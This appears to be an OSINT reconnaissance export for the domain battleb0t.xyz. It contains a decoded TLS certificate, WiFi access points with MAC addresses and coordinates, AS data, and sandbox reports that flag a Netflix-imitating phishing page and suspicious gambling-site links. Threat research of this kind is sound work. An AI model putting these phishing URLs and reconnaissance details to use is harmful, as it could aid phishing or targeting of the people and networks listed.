Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 14:27:58.330 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:5D:91:A5:EC:4A:FC:74:A1:CB:A1:43:42:
98:62:F0:F5:48:D8:59:AD:3A:BF:07:84:B7:A0:B8:FB:
F5:7F:02:9D:02:20:12:51:01:88:30:77:0C:12:2D:94:
E1:FC:28:63:C7:64:51:4C:7A:14:F6:58:60:D3:18:55:
AA:0B:5F:BF:83:CC
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 14:27:58.947 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D5:B1:CF:FB:EB:66:58:C1:7C:1F:B7:
27:25:02:E3:9E:12:C4:74:28:D8:27:C6:B7:CB:84:D4:
7D:B7:00:1E:10:02:20:0C:56:3E:2A:0C:E4:D2:75:F2:
E0:99:5F:A7:32:B4:86:4A:7F:09:D3:E9:8B:5E:F2:A9:
78:DC:08:7A:AD:C8:9D
Signature Algorithm: sha256WithRSAEncryption
56:f1:41:e3:6f:ab:da:37:be:d4:6d:55:43:59:14:33:ac:42:
61:99:54:b2:cc:68:3b:12:68:7c:14:63:9a:e3:c7:2d:28:07:
ac:4e:8c:b4:88:4d:80:ce:91:c9:a5:4d:dd:f1:2e:8e:58:cd:
80:0c:46:fa:23:e4:c8:e8:14:61:72:93:e1:44:e8:c3:77:c0:
aa:ee:7c:6f:ea:e8:70:f4:d2:e3:e8:1b:8a:39:ca:f5:73:f4:
96:02:3b:a3:36:c0:cb:29:b2:45:5f:f0:82:fc:84:4a:6e:b5:
8b:1c:4a:0e:46:1e:66:a9:10:39:d1:75:3c:a8:c4:57:7f:9f:
62:b2:b2:a2:ec:e6:f3:84:e9:0c:f9:be:3e:3f:3f:98:a2:49:
b7:f8:ec:62:7a:a6:69:6f:94:d9:c6:a1:e0:cd:b8:20:3a:ae:
44:80:7f:ac:d9:a3:54:24:56:5d:f1:bf:01:6e:fe:df:0c:62:
2d:77:e4:5c:18:4d:90:25:51:13:68:40:ac:f8:0c:fc:86:c6:
34:50:55:8e:da:35:b1:44:f3:0d:df:99:4c:2f:5a:3f:d4:52:
8d:52:80:94:14:ff:5b:30:58:13:05:5b:9a:df:d5:d4:32:40:
69:ff:dd:82:79:46:62:09:c8:ab:58:69:3f:2e:57:89:60:f9:
31:9d:86:6b
| battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | angelique (Net ID: 00:0B:6C:C7:12:D8) | 39.0469, -77.4903 |
| 2023-05-12 02:45:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://nabarun101.github.io/mynetflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://nabarun101.github.io/Mynetflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e04_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_e04_IE_EarlyTabStart_0x894_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3588"\n "IsoScope_e04_IESQMMUTEX_0_331"\n "IsoScope_e04_ConnHashTable<3588>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e04_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', 
u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "104.18.22.52:443"\n "172.64.101.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"nabarun101.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "nabarun101.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<p class="text-dark">Watch right on Netflix.com</p>" (Indicator: "dir "; File: "Mynetflix_2_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type 
"ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003588]\n "~DFFA2460BF0619E6A5.TMP" has type "data"- Location: [%TEMP%\\~DFFA2460BF0619E6A5.TMP]- [targetUID: 00000000-00003588]\n "~DF3C66DECFD1719D57.TMP" has type "data"- Location: [%TEMP%\\~DF3C66DECFD1719D57.TMP]- [targetUID: 00000000-00003588]\n "~DF11E03E1F26AC0C90.TMP" has type "data"- Location: [%TEMP%\\~DF11E03E1F26AC0C90.TMP]- [targetUID: 00000000-00003588]\n "urlref_httpnabarun101.github.ioMynetflix" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._B3D1C4BF-E888-11ED-8ED0-08002750FF42_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_BBFF638A-E888-11ED-8ED0-08002750FF42_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B3D1C4C1-E888-11ED-8ED0-08002750FF42_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /Mynetflix/"'}, {u'category': u'Network Related', 
u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://nabarun101.github.io/Mynetflix/"\n Pattern match: "http://nabarun101.github.io"\n Pattern match: "http://nabarun101.github.io/Mynetflix"\n Pattern match: "MUID089815D4E5BB620D23EC06D1E43F63D8msn.com/102523667231108893306123338431030421*"\n Pattern match: "SUIDMmicrosoft.com/9216415271475231030538305717088431030421*MUID3E7917FF718064A210F604FA700465BDmicrosoft.com/1025428520396831108892305732713431030421*_EDGE_V1microsoft.com/9216428520396831108892305732713431030421*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "SUIDMmicrosoft.com/9216415271475231030538305717088431030421*MUID3E7917FF718064A210F604FA700465BDmicrosoft.com/1025428520396831108892305732713431030421*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "https://kit.fontawesome.com/d83bab02e7.js"\n Pattern match: "MUIDB3E7917FF718064A210F604FA700465BDieonline.microsoft.com/9216428520396831108892305732713431030421*"\n Pattern match: "isdomainmigratedtruewww.msn.com/102589365619231066648306107713431030421*"\n Pattern match: "www.msn.com/"\n Pattern match: "SUIDMmicrosoft.com/9216415271475231030538305717088431030421*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Heuristic match: "nabarun101.github.io"\n Heuristic match: "ka-f.fontawesome.com"\n Heuristic match: "kit.fontawesome.com"\n Pattern match: 
"https://nabarun101.github.io/Mynetflix/Accept-Language"\n Heuristic match: "GET /Mynetflix/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: nabarun101.github.io"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"'}, {u'category' | 185.199.111.153 |
| 2023-05-12 02:54:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://rebrand.ly/altbdsakong', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://rebrand.ly/altbdsakong', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://rebrand.ly/promobdsakong', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://sakong88.cfd/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3f0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_3f0_IESQMMUTEX_0_303"\n "IsoScope_3f0_IESQMMUTEX_0_519"\n "IsoScope_3f0_ConnHashTable<1008>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_3f0_IE_EarlyTabStart_0xdc0_Mutex"\n "IsoScope_3f0_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1008"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1008"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': 
u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.62.177:80"\n "104.21.62.177:443"\n "172.217.12.104:443"\n "104.17.25.14:443"\n "172.67.178.49:443"\n "184.106.10.72:443"\n "142.251.46.174:443"\n "185.199.109.153:443"\n "151.101.24.193:443"\n "142.250.189.234:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"sakong88.cfd"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"100tst.sbs"\n "sakong88.cfd"\n "www.livehelpnow.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ve.ca+"&cx=c";Fo()&&(f+="&sign="+ve.Td);var g=Ee||Ge?Eo(b,f):void 0;g||(g=ql("https://","http://",ve.kd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Go(){if(Zh()){return!0}return!1};var Jo=new 
RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Ko={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Lo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "require-2.1.15.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "UX285OWR" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\0CH0OVJV\\UX285OWR]- [targetUID: 00000000-00002624]\n "~DFF8A3E5E5181D3E63.TMP" has type "data"- Location: [%TEMP%\\~DFF8A3E5E5181D3E63.TMP]- [targetUID: 00000000-00001008]\n "deposit-bg_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] progressive precision 8 1005x274 components 3"- [targetUID: N/A]\n "daftar_1_.png" has type 
"PNG image data 110 x 44 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "aes-handler_1_.js" has type "UTF-8 Unicode (with BOM) text"- [targetUID: N/A]\n "Q5BD73BH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Q5BD73BH.txt]- [targetUID: 00000000-00002624]\n "_74374BB3-BF3B-11ED-9D36-080027B3A16B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "login_1_.png" has type "PNG image data 110 x 44 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "livechat_1_.png" has type "PNG image data 300 x 108 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "analytics_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_73FA66E3-BF3C-11ED-9D36-080027B3A16B_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "slide3_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] progressive precision 8 772x273 components 3"- [targetUID: N/A]\n "AES-3.1.2_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "menu_1_.png" has type "PNG image data 1005 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"sakong88.cfd" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', 
u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "http://www.w3.org/1999/xhtml"\n Pattern match: "http://schema.org"\n Pattern match: "https://sakong88.cfd/img/assets/image/logo.png"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://sakong88.cfd/"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "v3.1.2code.google.com/p/crypto-js(c)"\n Pattern match: "http://github.com/jrburke/requirejs"\n Pattern match: "https://100tst.sbs/bdsakong/slide1.jpg"\n Pattern match: "https://100tst.sbs/bdsakong/slide2.jpg"\n Pattern match: "https://100tst.sbs/bdsakong/slide3.jpg"\n Pattern match: "https://rebrand.ly/promobdsakong"\n Pattern match: "https://rebrand.ly/web-liga138"\n Pattern match: "https://api.whatsapp.com/send?phone=85569313520"\n Pattern match: "https://t.me/bdsakong"\n Pattern match: "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"\n Pattern match: "https://i.imgur.com/PVD22l6.png"\n Pattern match: "https://rebrand.ly/altbdsakong"\n Pattern match: "https://www.googletagmanager.com/gtag/js?id=UA-110460148-7"\n Pattern match: "www.livehelpnow.net/lhn/widgets/chatbutton/lhnchatbutton-current.min.js"\n Pattern match: ".2.2001229779.1678449772sakong88.cfd/108879072409631166699103678149231019848*_gidGA1.2.1487777423.1678449772sakong88.cfd/1088174468249631020049103709399231019848*"\n Pattern match: 
".2.2001229779.1678449772sakong88.cfd/108879072409631166699103678149231019848*_gidGA1.2.1487777423.1678449772sakong88.cfd/1088174468249631020049103709399231019848*_gat_gtag_UA_110460148_71sakong88.cfd/1088163310899231019848103725024231019848*"\n Pattern match: ".2.2001229779.1678449772sakong88.cfd/108879072409631166699103678149231019848*_gidGA1.2.1487777423.1678449772sakong88.cfd/1088174468249631020049103709399231019848*langidsakong88.cfd/1088307940019231093273106244555531019848*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "https://www.google-analytics.com/analytics.js,k=c.F?op(R(c,gaFunctionName)):op();if(pa(k)){var"\n Pattern match: "https | 185.199.109.153 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/jonas.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:53:06 | Raw Data from RIRs | No | Hybrid Analysis | 4 | 0 | 2 | 0 | None | (raw Hybrid Analysis sandbox report for https://cndglobelogistics.com/index.php/about omitted) | 185.199.109.153 |
| 2023-05-12 02:54:17 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:4700:3037::6815:470e |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.156): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D1:54) | 32.8608, -79.9746 |
| 2023-05-12 02:54:00 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 104.21.6.166 |
| 2023-05-12 02:55:21 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 207.154.228.169 |
| 2023-05-12 02:44:24 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
